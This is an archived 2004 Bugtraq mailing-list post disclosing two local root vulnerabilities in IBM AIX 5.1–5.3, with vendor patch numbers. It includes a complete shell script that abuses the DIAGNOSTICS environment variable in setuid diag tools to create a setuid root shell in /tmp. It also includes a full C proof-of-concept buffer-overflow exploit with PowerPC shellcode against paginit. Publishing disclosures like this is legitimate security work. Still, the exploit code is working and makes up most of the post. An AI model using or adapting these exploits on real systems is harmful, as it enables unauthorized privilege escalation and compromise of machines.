lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 20 Dec 2004 12:10:41 +0100
From: cees-bart <ceesb@...ru.nl>
To: bugtraq@...urityfocus.com
Subject: AIX 5.1/5.2/5.3 local root exploits


hi,

i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3 
(unix for IBM RS/6000 powerpc).

1) the first is a bug in all setuid diag related tools that use an 
environment variable as a prefix to an external binary executed as root.

2) the second is a classical stack overflow in a tool called paginit.

status: vendor contacted, patches are available:

1) for the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and 
IY64277(5.3).
2) for the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2), 
and IY64312(5.3).

bug descriptions below.

regards,
cees-bart
phd student @ university of nijmegen

---

bug 1:

there are (at least) 4 broken suid binaries.

-r-sr-xr-x   1 root     system        10014 Sep 16 2002  /usr/sbin/lsmcode
-r-sr-x---   1 root     system         2796 Jan 26 2003  
/usr/sbin/diag_exec
-r-sr-xr-x   1 root     system       450433 Apr 08 2004  /usr/sbin/invscout
-r-sr-xr-x   1 root     system       511362 Apr 08 2004  
/usr/sbin/invscoutd

all these binaries are exploited the same way: the path set in the 
$DIAGNOSTICS environment is used by these binaries to execute 
$DIAGNOSTICS/bin/Dctrl as root (duh).

for example; executing the following gives a root shell:

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

bug 2:

the following setuid binary:

-r-sr-xr-x   1 root     security       7354 Mar 12 2003  /usr/bin/paginit

does not do a bounds check on the first commandline argument, which is 
supposed to be a username.
if you feed paginit the proper data and hit enter, root priviledges are 
gained.

POC exploit code:

/* exploit for /usr/bin/paginit
   tested on: AIX 5.2

   if the exploit fails it's because the shellcode
   ends up at a different address. use dbx to check,
   and change RETADDR accordingly.

   cees-bart <ceesb@...ru.nl>
*/

#define RETADDR 0x2ff22c90

char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"      
"\x7c\xa8\x02\xa6"      
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"      
"\x7c\xc7\x48\x10"      
"\x38\x46\xc9\x05"      
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"      
"\x38\x87\xee\xef"      
"\x7c\xc9\x03\xa6"      
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"      
"\x2f\x73\x68\x00"
;

char envlabel[] = "X=";

void printint(char* buf, int x) {
  buf[0] = x >> 24;
  buf[1] = (x >> 16) & 0xff;
  buf[2] = (x >> 8) & 0xff;
  buf[3] = x & 0xff;
}

int main(int argc, char **argv) {
  char *env[3];
  char code[1000];
  char buf[8000];
  char *p, *i;
  int offset1 = 0;

  offset1 = 0; // atoi(argv[1]);
  
  memset(code, 'C', sizeof(code));
  memcpy(code, envlabel,sizeof(envlabel)-1);
  // landingzone 
  for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4) 
    printint(i, 0x7ca52a79);

  memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);  
  code[sizeof(code)-1] = 0;
  
  env[0] = code;
  env[1] = 0;

  memset(buf, 'A', sizeof(buf));
  buf[sizeof(buf)-1] = 0; 
  
  p = buf;
  p += 4114;
  printint(p,RETADDR); // try to hit the landingzone
  p += 72;
  printint(p, RETADDR); // any readable address (apparently not overwritten)

  execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
}
  



Powered by blists - more mailing lists